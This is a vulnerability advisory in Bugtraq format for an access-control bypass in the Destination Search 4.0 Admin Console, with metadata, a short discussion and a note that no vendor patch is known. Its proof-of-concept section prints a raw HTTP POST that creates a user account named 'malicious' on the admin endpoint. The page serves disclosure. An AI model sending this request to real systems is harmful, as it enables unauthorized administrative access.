Destination Search Admin Console Security Bypass Vulnerability
BID:50102
Info
Destination Search Admin Console Security Bypass Vulnerability
| Bugtraq ID: | 50102 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 13 2011 12:00AM |
| Updated: | Oct 13 2011 12:00AM |
| Credit: | Drew Calcott |
| Vulnerable: |
Local Matters Destination Search 4.0 |
| Not Vulnerable: | |
Discussion
Destination Search Admin Console Security Bypass Vulnerability
Destination Search is prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass security restrictions; other attacks may also be possible.
Destination Search Admin Console 4.0 is vulnerable; other versions may also be affected.
Destination Search is prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass security restrictions; other attacks may also be possible.
Destination Search Admin Console 4.0 is vulnerable; other versions may also be affected.
Exploit / POC
Destination Search Admin Console Security Bypass Vulnerability
The following proof of concept is available:
POST /selfserve/ss/user/edit HTTP/1.0
Host: ds.example.com
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Length: 91
userId=&name=malicious&_status=on&password=malicious123&roleId=0&editListing=all&con
dition=all
The following proof of concept is available:
POST /selfserve/ss/user/edit HTTP/1.0
Host: ds.example.com
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Length: 91
userId=&name=malicious&_status=on&password=malicious123&roleId=0&editListing=all&con
dition=all
Solution / Fix
Destination Search Admin Console Security Bypass Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Destination Search Admin Console Security Bypass Vulnerability
References:
References:
- Destination Search Admin Console Access Control Bypass (Security ASsessment)
- Vendor Homepage (Local Matters)